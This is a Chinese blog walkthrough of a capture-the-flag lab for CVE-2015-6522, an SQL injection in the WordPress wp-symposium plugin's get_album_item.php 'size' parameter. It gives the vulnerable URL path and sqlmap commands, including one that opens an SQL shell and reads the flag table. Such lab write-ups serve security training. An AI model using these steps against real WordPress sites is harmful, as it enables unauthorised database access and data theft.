春秋云境CVE-2015-6522

1.阅读靶场介绍

这里给出了路径是wp-symposium/get_album_item.php

涉及的参数是size

用到的方法是sql注入

这样看来思路很清晰了,直接进入靶场吧

2.启动靶场

进入靶场后如下图所示

这里博主也提一下自己打靶场的一个春秋云境的经验

凡是遇到wordpress这类型的靶场

我们都是默认/wp-content/plugins/在前面加上这两个路径哟

好了,接下来进入poc环节了

3.poc

我们直接访问这个url

https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1

会出现如下图所示的页面

这里我们直接启动sqlmap

首先我们执行的是这个命令

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch

看看会不会出现SQL注入的方法

结果是:

存在时间盲注的方式

接下来就是

执行这个语句

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch --sql-shell

最后我们会得到发现可以进入界面

然后在执行这个命令

select flag from flag

稍等片刻以后就可以找到flag了

文章到此结束,恭喜各位又攻克一个靶场

期待博主出什么春秋云景教学的请留言哟

感谢各位宝贵的时间

相关推荐
日取其半万世不竭2 分钟前
新服务器买完 24 小时内要做什么?安全加固清单
运维·服务器·安全
中科三方20 分钟前
路由器DNS遭大规模篡改,对政企DNS安全防护有哪些启示?
安全·智能路由器
百度安全23 分钟前
2025 百度 ESG 报告发布:以 AI 筑盾,共建可信数字生态
人工智能·网络安全
Bruce_Liuxiaowei24 分钟前
2026年6月第2周网络安全形势周报
人工智能·安全·web安全·ai·大模型·智能体
阿昭L25 分钟前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
志栋智能32 分钟前
超自动化安全的实施路径:从单点场景到体系化建设
运维·网络·安全·自动化
网络研究院38 分钟前
端点安全完整指南
安全·端点·指南·网络研究观
xhtdj1 小时前
Build 2026:Azure API Management 推出统一模型 API 并新增 MCP 内容安全能力
人工智能·安全·azure
Splashtop高性能远程控制软件1 小时前
微软2026年6月补丁星期二技术分析:206个漏洞、3个已公开零日的分级修复方案
运维·安全·自动化·远程桌面·splashtop
云安全助手1 小时前
国内调用GPT的现实困境与聚合平台解决方案探析
网络·人工智能·网络安全·ai大模型